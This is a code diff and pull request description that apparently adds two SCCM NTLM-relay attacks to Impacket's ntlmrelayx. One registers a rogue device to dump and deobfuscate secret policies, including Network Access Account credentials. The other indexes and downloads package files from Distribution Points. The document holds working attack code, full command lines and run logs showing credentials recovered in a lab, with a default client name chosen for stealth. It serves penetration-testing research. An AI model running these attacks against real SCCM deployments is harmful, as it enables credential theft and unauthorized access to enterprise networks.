+    if policyFlagValue & PERSISTWHOLEPOLICY != 0:
+        result.append("PERSISTWHOLEPOLICY")
+    if policyFlagValue & AUTHORIZEDDYNAMICDOWNLOAD != 0:
+        result.append("AUTHORIZEDDYNAMICDOWNLOAD")
+    if policyFlagValue & COMPRESSED != 0:
+        result.append("COMPRESSED")
+    
+    return result
+
+
+
+class SCCMPoliciesAttack:
+    
+    def _run(self):
+        LOG.info("Starting SCCM policies attack")
+
+        management_point = f"{'https' if self.client.port == 443 else 'http'}://{self.client.host}"
+        loot_dir = f"{self.client.host}_{datetime.now().strftime('%Y%m%d%H%M%S')}_sccm_policies_loot"
+        if self.config.SCCMPoliciesClientname == None: self.config.SCCMPoliciesClientname = self.username.rstrip('$')
+        if self.config.SCCMPoliciesSleep == None: self.config.SCCMPoliciesSleep = 180
+
+        try:
+            os.makedirs(loot_dir, exist_ok=True)
+            LOG.info(f"Loot directory is: {loot_dir}")
+        except Exception as err:
+            LOG.error(f"Error creating base output directory: {err}")
+            return
+
+        os.makedirs(f"{loot_dir}/device")
+        LOG.info(f"Generating Private key and client (self-signed) certificate")
+        private_key = createPrivateKey()
+        certificate = createCertificate(private_key)
+        public_key = certificate.public_bytes(serialization.Encoding.DER).hex().upper()
+        # Writing certs to device info directory for potential future use
+        with open(f"{loot_dir}/device/cert.pem", 'wb') as f:
+            f.write(certificate.public_bytes(serialization.Encoding.PEM))
+        with open(f"{loot_dir}/device/key.pem", 'wb') as f:
+            f.write(private_key.private_bytes(encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption()))
+
+        # Device registration  
+        LOG.info(f"Registering SCCM client with client name '{self.config.SCCMPoliciesClientname}'")
+        registration_request_payload = generateRegistrationRequestPayload(management_point, public_key, private_key, self.config.SCCMPoliciesClientname)
+        
+        try:
+            register_response = self.registerClient(management_point, registration_request_payload)
+            if register_response == None:
+                LOG.error(f"Device registration failed: {e}")
+                return
+            root = ET.fromstring(register_response[:-1])
+            client_guid = root.attrib["SMSID"].split("GUID:")[1]
+        except Exception as e:
+            LOG.error(f"Device registration failed: {e}")
+            return
+    
+        with open(f"{loot_dir}/device/guid.txt", 'w') as f:
+            f.write(f"{client_guid}\n")
+        with open(f"{loot_dir}/device/client_name.txt", 'w') as f:
+            f.write(f"{self.config.SCCMPoliciesClientname}\n")
+
+        LOG.info(f"Client registration complete - GUID: {client_guid}")
+        LOG.info(f"Sleeping for {self.config.SCCMPoliciesSleep} seconds")
+        sleep(int(self.config.SCCMPoliciesSleep))
+
+
+        # Policies request
+        policies_request_payload = generatePoliciesRequestPayload(management_point, private_key, client_guid, self.config.SCCMPoliciesClientname)
+
+        try:
+            policies_response = self.requestPolicies(management_point, policies_request_payload)
+            root = ET.fromstring(policies_response[:-1])
+            policies = root.findall(".//Policy")
+            policies_json = {}
+            for policy in policies:
+                policies_json[policy.attrib["PolicyID"]] = {"PolicyVersion": policy.attrib["PolicyVersion"] if "PolicyVersion" in policy.attrib else "N/A",
+                                                "PolicyType": policy.attrib["PolicyType"] if "PolicyType" in policy.attrib else "N/A",
+                                                "PolicyCategory": policy.attrib["PolicyCategory"] if "PolicyCategory" in policy.attrib else "N/A",
+                                                "PolicyFlags": parsePoliciesFlags(policy.attrib["PolicyFlags"]) if "PolicyFlags" in policy.attrib else "N/A",
+                                                "PolicyLocation": policy[0].text.replace("<mp>", management_point.split('http://')[1]) }
+            with open(f'{loot_dir}/policies.json', 'w') as f:
+                f.write(json.dumps(policies_json))
+            with open(f'{loot_dir}/policies.raw', 'w') as f:
+                f.write(policies_response)
+            secret_policies = {}
+            for key, value in policies_json.items():
+                if isinstance(value["PolicyFlags"], list) and "SECRET" in value["PolicyFlags"]:
+                    secret_policies[key] = value
+        except Exception as e:
+            LOG.error(f"Policies request failed: {e}")
+            return
+
+        LOG.info(f"Policies list retrieved. {len(policies_json.keys())} total policies; {len(secret_policies.keys())} secret policies")
+        if len(secret_policies.keys()) <= 0:
+            LOG.error(f"No secret policies retrieved. Either you relayed a user account and automatic device approval is not enabled, or something went wrong")
+            return
+
+
+        for key, value in secret_policies.items():
+            try:
+                result = self.secretPolicyProcess(key, value, private_key, client_guid, loot_dir)
+                if result['NAA_credentials'] is not None:
+                    LOG.info(f"Retrieved NAA account credentials: '{result['NAA_credentials']['NetworkAccessUsername']}:{result['NAA_credentials']['NetworkAccessPassword']}'")
+            except Exception as e:
+                LOG.info(f"Encountered an error when trying to process secret policy {key} - {e}")
+
+        LOG.info(f"DONE - attack finished. Check loot directory {loot_dir}")
+        LOG.info("You can reuse the registered device from the generated GUID/private key in the device/ subdirectory - for instance with SCCMSecrets.py. This is only possible for a limited time, before the legitimate device re-registers itself.")
+
+        
+    
+
+    def registerClient(self, management_point, registration_request_payload):
+        headers = {
+            "Connection": "close",
+            "User-Agent": "ConfigMgr Messaging HTTP Sender",
+            "Content-Type": "multipart/mixed; boundary=\"aAbBcCdDv1234567890VxXyYzZ\""
+        }
+        
+        self.client.request("CCM_POST", f"{management_point}/ccm_system_windowsauth/request", registration_request_payload, headers=headers)
+        body = self.client.getresponse().read()
+
+
+        boundary = "aAbBcCdDv1234567890VxXyYzZ"
+        multipart_data = body.split(('--' + boundary).encode())
+        for part in multipart_data:
+            if not part or part == b'--\r\n':
+                continue
+            try:
+                headers_part, content = part.split(b'\r\n\r\n', 1)
+            except:
+                pass
+
+            if b'application/octet-stream' in headers_part:
+                decompressed_content = zlib.decompress(content).decode('utf-16')
+                return decompressed_content
+        return None
+    
+    def requestPolicies(self, management_point, policies_request_payload):
+        headers = {
+            "Connection": "close",
+            "User-Agent": "ConfigMgr Messaging HTTP Sender",
+            "Content-Type": "multipart/mixed; boundary=\"aAbBcCdDv1234567890VxXyYzZ\""
+        }
+
+        self.client.request("CCM_POST", f"{management_point}/ccm_system/request", policies_request_payload, headers=headers)
+        body = self.client.getresponse().read()
+
+        boundary = "aAbBcCdDv1234567890VxXyYzZ"
+        multipart_data = body.split(('--' + boundary).encode())
+        for part in multipart_data:
+            if not part or part == b'--\r\n':
+                continue
+            try:
+                headers_part, content = part.split(b'\r\n\r\n', 1)
+            except:
+                pass
+
+            if b'application/octet-stream' in headers_part:
+                decompressed_content = zlib.decompress(content).decode('utf-16')
+                return decompressed_content
+        return None
+    
+    def requestPolicy(self, policy_url, client_guid, private_key):
+        headers = {
+            "Connection": "close",
+            "User-Agent": "ConfigMgr Messaging HTTP Sender"
+        }
+
+        headers["ClientToken"] = f"GUID:{client_guid};{datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')};2"
+        headers["ClientTokenSignature"] = SCCMSign(private_key, f"GUID:{client_guid};{datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')};2".encode('utf-16')[2:] + "\x00\x00".encode('ascii')).hex().upper()
+
+        self.client.request("GET", policy_url, headers=headers)
+        r = self.client.getresponse().read()
+        return r
+
+
+    def secretPolicyProcess(self, policyID, policy, private_key, client_guid, loot_dir):
+        LOG.info(f"Processing secret policy {policyID}")
+        os.makedirs(f'{loot_dir}/{policyID}')
+
+        NAA_credentials = {"NetworkAccessUsername": None, "NetworkAccessPassword": None}
+        policy_response = self.requestPolicy(policy["PolicyLocation"], client_guid, private_key)
+        decrypted = decryptSecretPolicy(policy_response, private_key)[:-1]
+        decrypted = cleanJunkInXML(decrypted)
+        
+        if policy["PolicyCategory"] == "CollectionSettings":
+            LOG.debug("Processing a CollectionSettings policy to extract collection variables")
+            root = ET.fromstring(decrypted)
+            binary_data = binascii.unhexlify(root.text)
+            decompressed_data = zlib.decompress(binary_data)
+            decrypted = decompressed_data.decode('utf16')
+
+        with open(f'{loot_dir}/{policyID}/policy.txt', 'w') as f:
+            f.write(decrypted)
+        
+        
+        root = ET.fromstring(decrypted)
+
+        blobs_set = {}
+
+        if policy["PolicyCategory"] == "CollectionSettings":
+            for instance in root.findall(".//instance"):
+                name = None
+                value = None
+                for prop in instance.findall('property'):
+                    prop_name = prop.get('name')
+                    if prop_name == 'Name':
+                        name = prop.find('value').text.strip()
+                    elif prop_name == 'Value':
+                        value = prop.find('value').text.strip()
+                blobs_set[name] = value
+
+        else:
+            obfuscated_blobs = root.findall('.//*[@secret="1"]')    
+            for obfuscated_blob in obfuscated_blobs:       
+                blobs_set[obfuscated_blob.attrib["name"]] = obfuscated_blob[0].text
+        
+        LOG.debug(f"Found {len(blobs_set.keys())} obfuscated blob(s) in secret policy.")
+        for i, blob_name in enumerate(blobs_set.keys()):
+            data = deobfuscateSecretPolicyBlob(blobs_set[blob_name])
+            filename = f'{loot_dir}/{policyID}/secretBlob_{str(i+1)}-{blob_name}.txt'
+            with open(filename, 'w') as f:
+                f.write(f"Secret property name: {blob_name}\n\n")
+                f.write(data + "\n")
+            if blob_name == "NetworkAccessUsername":
+                NAA_credentials["NetworkAccessUsername"] = data
+            if blob_name == "NetworkAccessPassword":
+                NAA_credentials["NetworkAccessPassword"] = data
+
+            LOG.debug(f"Deobfuscated blob n°{i+1}")
+            try:
+                blobroot = ET.fromstring(cleanJunkInXML(data))
+                source_scripts = blobroot.findall('.//*[@property="SourceScript"]')
+                if len(source_scripts) > 0:
+                    LOG.debug(f"Found {len(source_scripts)} embedded powershell scripts in blob.")
+                    for j, script in enumerate(source_scripts):
+                        decoded_script = base64.b64decode(script.text).decode('utf-16le')
+                        with open(f'{loot_dir}/{policyID}/secretBlob_{str(i+1)}-{blob_name}_embeddedScript_{j+1}.txt', 'w') as f:
+                            f.write(decoded_script)
+                            f.write("\n")
+
+            except ET.ParseError as e:
+                LOG.debug("Failed parsing XML on this blob - not XML content")
+                pass
+        
+        if NAA_credentials["NetworkAccessUsername"] is not None:
+            return {"NAA_credentials": NAA_credentials}
+        else:
+            return {"NAA_credentials": None}
+

--- a/impacket/examples/ntlmrelayx/attacks/httpattacks/sccmpoliciesattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/httpattacks/sccmpoliciesattack.py
@@ -373,7 +373,7 @@ class SCCMPoliciesAttack:
         try:
             register_response = self.registerClient(management_point, registration_request_payload)
             if register_response == None:
-                LOG.error(f"Device registration failed: {e}")
+                LOG.error(f"Device registration failed")
                 return
             root = ET.fromstring(register_response[:-1])
             client_guid = root.attrib["SMSID"].split("GUID:")[1]

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -103,6 +103,15 @@ class NTLMRelayxConfig:
         self.ShadowCredentialsExportType = None
         self.ShadowCredentialsOutfilePath = None
 
+        # SCCM attacks options
+        self.isSCCMPoliciesAttack = False
+        self.SCCMPoliciesClientname = None
+        self.SCCMPoliciesSleep = None
+        self.isSCCMDPAttack = False
+        self.SCCMDPIndexfile = None
+        self.SCCMDPExtensions = None
+        self.SCCMDPFiles = None
+
     def setSMBChallenge(self, value):
         self.SMBServerChallenge = value
 
@@ -243,6 +252,21 @@ class NTLMRelayxConfig:
         self.ShadowCredentialsPFXPassword = ShadowCredentialsPFXPassword
         self.ShadowCredentialsExportType = ShadowCredentialsExportType
         self.ShadowCredentialsOutfilePath = ShadowCredentialsOutfilePath
+    
+    def setIsSCCMPoliciesAttack(self, isSCCMPoliciesAttack):
+        self.isSCCMPoliciesAttack = isSCCMPoliciesAttack
+    
+    def setSCCMPoliciesOptions(self, sccm_policies_clientname, sccm_policies_sleep):
+        self.SCCMPoliciesClientname = sccm_policies_clientname
+        self.SCCMPoliciesSleep = sccm_policies_sleep
+    
+    def setIsSCCMDPAttack(self, isSCCMDPAttack):
+        self.isSCCMDPAttack = isSCCMDPAttack
+    
+    def setSCCMDPOptions(self, sccm_dp_indexfile, sccm_dp_extensions, sccm_dp_files):
+        self.SCCMDPIndexfile = sccm_dp_indexfile
+        self.SCCMDPExtensions = sccm_dp_extensions
+        self.SCCMDPFiles = sccm_dp_files
 
     def setAltName(self, altName):
         self.altName = altName

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -108,7 +108,6 @@ class NTLMRelayxConfig:
         self.SCCMPoliciesClientname = None
         self.SCCMPoliciesSleep = None
         self.isSCCMDPAttack = False
-        self.SCCMDPIndexfile = None
         self.SCCMDPExtensions = None
         self.SCCMDPFiles = None
 
@@ -263,8 +262,7 @@ class NTLMRelayxConfig:
     def setIsSCCMDPAttack(self, isSCCMDPAttack):
         self.isSCCMDPAttack = isSCCMDPAttack
     
-    def setSCCMDPOptions(self, sccm_dp_indexfile, sccm_dp_extensions, sccm_dp_files):
-        self.SCCMDPIndexfile = sccm_dp_indexfile
+    def setSCCMDPOptions(self, sccm_dp_extensions, sccm_dp_files):
         self.SCCMDPExtensions = sccm_dp_extensions
         self.SCCMDPFiles = sccm_dp_files
 

--- a/requirements.txt
+++ b/requirements.txt
@@ -9,4 +9,3 @@ ldap3>=2.5,!=2.5.2,!=2.5.0,!=2.6
 ldapdomaindump>=0.9.0
 flask>=1.0
 pyreadline3;sys_platform == 'win32'
-cryptography

--- a/requirements.txt
+++ b/requirements.txt
@@ -9,3 +9,4 @@ ldap3>=2.5,!=2.5.2,!=2.5.0,!=2.6
 ldapdomaindump>=0.9.0
 flask>=1.0
 pyreadline3;sys_platform == 'win32'
+cryptography


### PR DESCRIPTION
This pull request offers an implementation of NTLM relaying attack vectors targeting the HTTP endpoints of SCCM Management Points (for secret policies dumping) and Distribution Points (for sensitive package files retrieval).

To this end, two new attacks related to SCCM are implemented, along with some options for each of them.
```
$ python3 examples/ntlmrelayx.py --help
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies 
[...]
SCCM Policies attack options:
  --sccm-policies       Enable SCCM policies attack. Performs SCCM secret policies dump from a Management Point by registering a device. Works best when relaying a machine account. Expects as target 'http://<MP>/ccm_system_windowsauth/request'
  --sccm-policies-clientname SCCM_POLICIES_CLIENTNAME
                        The name of the client that will be registered in order to dump secret policies. Defaults to the relayed account's name
  --sccm-policies-sleep SCCM_POLICIES_SLEEP
                        The number of seconds to sleep after the client registration before requesting secret policies

SCCM Distribution Point attack options:
  --sccm-dp             Enable SCCM Distribution Point attack. Perform package file dump from an SCCM Distribution Point. Expects as target 'http://<DP>/sms_dp_smspkg$/Datalib'
  --sccm-dp-indexfile SCCM_DP_INDEXFILE
                        The path to the index.json file produced by a previous run of the SCCM DP attack. Providing this argument will skip file indexing
  --sccm-dp-extensions SCCM_DP_EXTENSIONS
                        A custom list of extensions to look for when downloading files from the SCCM Distribution Point. If not provided, defaults to .ps1,.bat,.xml,.txt,.pfx
  --sccm-dp-files SCCM_DP_FILES
                        The path to a file containing a list of specific URLs to download from the Distribution Point, instead of downloading by extensions. Providing this argument will skip file indexing
```

#### SCCM Policies attack: targeting the Management Point for secret policies retrieval 

This SCCM policies attack will attempt to relay the NTLM authentication data of a domain account (ideally a machine account) to the `/ccm_system_windowsauth/request` HTTP endpoint of a Management Point. It will then register a device in order to retrieve a list of policies. It will then parse this list of policies to extract secret ones and deobfuscate their protected blobs. Note that the proposed implementation is not limited to the NAA policy, but will retrieve all secret policies (including Collection Variables).

The `--sccm-policies-clientname` allows customizing the client name used for the registered device. It defaults to the currently relayed account for stealth purposes.
The `--sccm-policies-sleep` allows customizing the time to wait after registration. It may be interesting to raise its default value of 180 seconds to wait for the device to be added to collections on SCCM's side.

**NOTE**: when relaying an existing machine account in order to register a new device and dump secret policies, it may be possible that the relayed machine account is already associated with an SCCM device. In this case, the machine will temporarily have the wrong device certificates. It will however automatically re-register itself when needing to interact with SCCM.
The policies retrieval attack saves the certificate/private key generated during device registration, so it can be reused (for instance with SCCMSecrets.py - it may be useful if we did not wait long enough for the device to be added to collections) - it is however only possible before the legitimate device re-registers itself and overwrites our certificate.
The advantage of performing secret policies dump while relaying a machine account already associated with an SCCM device is that we will be able to dump the secret policies of this device's collection (and not only default collections).

This attack writes the results in an output directory composed of the `device` subdirectory (containing device certificate, GUID, name), the raw/json representation of the full policies list, and a subfolder per secret policy. In the secret policy subfolders, the secret policy is written, as well as the cleartext of every deobfuscated secret blobs.

```
$ python3 examples/ntlmrelayx.py -t 'http://mecm.sccm.lab/ccm_system_windowsauth/request' -smb2support --sccm-policies -debug  --sccm-policies-sleep 30
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies 
[...]

[*] Servers started, waiting for connections
[*] Setting up RAW Server on port 6666
[*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.60.13, attacking target http://mecm.sccm.lab
[*] HTTP server returned error code 403, treating as a successful login
[*] Authenticating against http://mecm.sccm.lab as SCCMLAB/CLIENT$ SUCCEED
[*] Starting SCCM policies attack
[*] Loot directory is: mecm.sccm.lab_20241009001009_sccm_policies_loot
[*] Generating Private key and client (self-signed) certificate
[*] All targets processed!
[*] SMBD-Thread-7 (process_request_thread): Connection from 192.168.60.13 controlled, but there are no more targets left!
[*] Registering SCCM client with client name 'CLIENT'
[*] Client registration complete - GUID: 5E038820-B52D-4E04-B979-757946BBF21C
[*] Sleeping for 30 seconds
[*] Policies list retrieved. 53 total policies; 9 secret policies
[*] Processing secret policy {3daadbd3-99d0-4223-ac34-13caad9c245e}
[+] Found 2 obfuscated blob(s) in secret policy.
[+] Deobfuscated blob n°1
[+] Failed parsing XML on this blob - not XML content
[+] Deobfuscated blob n°2
[+] Failed parsing XML on this blob - not XML content
[*] Retrieved NAA account credentials: 'sccm.lab\sccm-naa:123456789'
[*] Processing secret policy P0120002-P0100009-6F6BCC28
[+] Found 1 obfuscated blob(s) in secret policy.
[+] Deobfuscated blob n°1
[+] Found 1 embedded powershell scripts in blob.
[*] Processing secret policy P0120003-P010000A-6F6BCC28
[+] Found 1 obfuscated blob(s) in secret policy.
[+] Deobfuscated blob n°1
[*] Processing secret policy P012000A-P0100012-6F6BCC28
[+] Found 1 obfuscated blob(s) in secret policy.
[+] Deobfuscated blob n°1
[*] Processing secret policy P012000B-P0100013-6F6BCC28
[+] Found 1 obfuscated blob(s) in secret policy.
[+] Deobfuscated blob n°1
[*] Processing secret policy P012000C-P0100014-6F6BCC28
[+] Found 1 obfuscated blob(s) in secret policy.
[+] Deobfuscated blob n°1
[*] Processing secret policy P012000D-P0100015-6F6BCC28
[+] Found 1 obfuscated blob(s) in secret policy.
[+] Deobfuscated blob n°1
[*] Processing secret policy {P0100014}
[+] Processing a CollectionSettings policy to extract collection variables
[+] Found 2 obfuscated blob(s) in secret policy.
[+] Deobfuscated blob n°1
[+] Failed parsing XML on this blob - not XML content
[+] Deobfuscated blob n°2
[+] Failed parsing XML on this blob - not XML content
[*] Processing secret policy P012000E-P0100011-6F6BCC28
[+] Found 1 obfuscated blob(s) in secret policy.
[+] Deobfuscated blob n°1
[*] DONE - attack finished. Check loot directory mecm.sccm.lab_20241009001009_sccm_policies_loot
[*] You can reuse the registered device from the generated GUID/private key in the device/ subdirectory - for instance with SCCMSecrets.py. This is only possible for a limited time, before the legitimate device re-registers itself.
```

```
$ cd mecm.sccm.lab_20241009001009_sccm_policies_loot

$ ls
{3daadbd3-99d0-4223-ac34-13caad9c245e}  {P0100014}                  P0120003-P010000A-6F6BCC28  P012000B-P0100013-6F6BCC28  P012000D-P0100015-6F6BCC28  policies.json
device                                  P0120002-P0100009-6F6BCC28  P012000A-P0100012-6F6BCC28  P012000C-P0100014-6F6BCC28  P012000E-P0100011-6F6BCC28  policies.raw

$ ls \{3daadbd3-99d0-4223-ac34-13caad9c245e\}/
policy.txt  secretBlob_1-NetworkAccessUsername.txt  secretBlob_2-NetworkAccessPassword.txt

$ cat \{3daadbd3-99d0-4223-ac34-13caad9c245e\}/secretBlob_1-NetworkAccessUsername.txt 
Secret property name: NetworkAccessUsername

sccm.lab\sccm-naa

$ cat \{3daadbd3-99d0-4223-ac34-13caad9c245e\}/secretBlob_2-NetworkAccessPassword.txt 
Secret property name: NetworkAccessPassword

str0ngP4ss123!!
```


#### SCCM Distribution Point attack: targeting Distribution Points to retrieve sensitive package files

The SCCM Distribution Point attack will attempt to use the relayed NTLM data to authenticate to the `/sms_dp_smspkg$/Datalib` endpoint of a Distribution Point. This will first allow to index the files stored on the Distribution Point, by browsing the `Datalib` HTTP file directory structure. Once indexing has been performed, it will download the files with specific extensions.

The `--sccm-dp-extensions` allows customizing the extensions to look for. Providing an empty string will only perform indexing, nothing else.
The `--sccm-dp-indexfile` takes the path to an index file already produced by an SCCM Distribution Point attack. This is useful if you have indexed files of a Distribution Point in a previous attack, and you realized that you want to download files with other extensions. Specifying an existing index file (`index.json` from the loot directory) avoids indexing files again.
The `--sccm-dp-files` takes the path to a file containing a list of URLs, one by line, to be downloaded from the Distribution Point. This is again useful if you already ran an SCCM Distribution Point attack, and want to download specific files that seem interesting - without downloading all files with a similar extension. Providing this option will not trigger file indexing.

**NOTE**: I am aware of another pull request that was recently submitted to fetch files from the Distribution Point (#1790). Kudos to ar0dd, I used some elements from his pull request and indicated it in the produced SCCM DP attack file. I however chose a different approach in order to index files from the Distribution Point. Indeed, ad0dd relied on file signatures to find out what files are hosted on the Distribution Point. On my recent SCCM lab environment, it seems like these file signatures are not available by default. I thus chose the `Datalib` indexing method instead (that is also the default method of `sccm-http-looter`), which seems more reliable. I also added some more options regarding file download.

Similarly to the SCCM Policies attack, the output is written to a directory. It contains the `index.json` and `index.txt` files, representing an index of available files on the Distribution Point (the `.txt` file has a human-readable format mimicking the Unix `tree` command). Then, a subfolder is created for each package. The downloaded files are stored in these package subdirectories.

```
$ python3 examples/ntlmrelayx.py -t 'http://mecm.sccm.lab/sms_dp_smspkg$/Datalib' -smb2support --sccm-dp -debug
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies 
[...]

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.60.13, attacking target http://mecm.sccm.lab
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://mecm.sccm.lab as SCCMLAB/CLIENT$ SUCCEED
[*] Starting SCCM DP attack
[*] Loot directory is: mecm.sccm.lab_20241009003852_sccm_dp_loot
[+] Performing file indexing from Datalib
[*] All targets processed!
[*] SMBD-Thread-7 (process_request_thread): Connection from 192.168.60.13 controlled, but there are no more targets left!
[*] Found 9 packages
[+] {'P0100005.1', 'P0100001.1', 'P0100002.2', 'P0100007.1', 'P0100003.2', 'P010000C.1', 'TB4080000A', 'P0100006.1', 'P0100004.2'}
[*] File indexing from Datalib performed
[+] Performing file download
[*] Package P0100005.1 - downloaded file ep_defaultpolicy.xml
[*] Package P0100001.1 - downloaded file Config_AppsAndSettings.xml
[*] Package P0100001.1 - downloaded file Config_AppsOnly.xml
[*] Package P0100001.1 - downloaded file Config_SettingsOnly.xml
[*] Package P0100001.1 - downloaded file MigApp.xml
[*] Package P0100001.1 - downloaded file MigDocs.xml
[*] Package P0100001.1 - downloaded file MigUser.xml
[*] Package P0100001.1 - downloaded file Config_AppsAndSettings.xml
[*] Package P0100001.1 - downloaded file Config_AppsOnly.xml
[*] Package P0100001.1 - downloaded file Config_SettingsOnly.xml
[*] Package P0100001.1 - downloaded file MigApp.xml
[*] Package P0100001.1 - downloaded file MigDocs.xml
[*] Package P0100001.1 - downloaded file MigUser.xml
[*] Package P0100001.1 - downloaded file Config_AppsAndSettings.xml
[*] Package P0100001.1 - downloaded file Config_AppsOnly.xml
[*] Package P0100001.1 - downloaded file Config_SettingsOnly.xml
[*] Package P0100001.1 - downloaded file MigApp.xml
[*] Package P0100001.1 - downloaded file MigDocs.xml
[*] Package P0100001.1 - downloaded file MigUser.xml
[*] Package P010000C.1 - downloaded file JoinDomain.ps1
[*] File download performed
[*] DONE - attack finished. Check loot directory mecm.sccm.lab_20241009003852_sccm_dp_loot
```

```
$ cd mecm.sccm.lab_20241009003852_sccm_dp_loot

$ ls
index.json  index.txt  P0100001.1  P0100005.1  P010000C.1

$ cat index.txt | head -n 15
├── P0100005.1/
│   ├── http://mecm.sccm.lab/sms_dp_smspkg$/P0100005.1/i386/
│   │   ├── http://mecm.sccm.lab/sms_dp_smspkg$/P0100005.1/i386/ClientUpdate/
│   │   ├── http://mecm.sccm.lab/sms_dp_smspkg$/P0100005.1/i386/LanguagePack/
│   │   ├── http://mecm.sccm.lab/sms_dp_smspkg$/P0100005.1/i386/client.msi
│   │   ├── http://mecm.sccm.lab/sms_dp_smspkg$/P0100005.1/i386/microsoft.webview2.fixedversionruntime.x86.cab
│   │   ├── http://mecm.sccm.lab/sms_dp_smspkg$/P0100005.1/i386/microsoftpolicyplatformsetup.msi
│   │   ├── http://mecm.sccm.lab/sms_dp_smspkg$/P0100005.1/i386/mmasetup-i386.exe
│   │   ├── http://mecm.sccm.lab/sms_dp_smspkg$/P0100005.1/i386/ndp462-kb3151800-x86-x64-allos-enu.exe
│   │   ├── http://mecm.sccm.lab/sms_dp_smspkg$/P0100005.1/i386/vcredist_x86.exe
│   │   └── http://mecm.sccm.lab/sms_dp_smspkg$/P0100005.1/i386/windowsfirewallconfigurationprovider.msi
│   ├── http://mecm.sccm.lab/sms_dp_smspkg$/P0100005.1/x64/
│   │   ├── http://mecm.sccm.lab/sms_dp_smspkg$/P0100005.1/x64/ClientUpdate/
│   │   ├── http://mecm.sccm.lab/sms_dp_smspkg$/P0100005.1/x64/LanguagePack/
│   │   ├── http://mecm.sccm.lab/sms_dp_smspkg$/P0100005.1/x64/client.msi

$ cat P010000C.1/JoinDomain.ps1 
$filePath = "C:\tmp\out.txt"
$content = "Task sequence download script"
[...]
```

The tests regarding this pull request were mainly performed on SCCM version 2403 (5.2403.1171.1000). The source code is heavily inspired by the SCCMSecrets.py tool (https://github.com/synacktiv/SCCMSecrets/), which I also authored.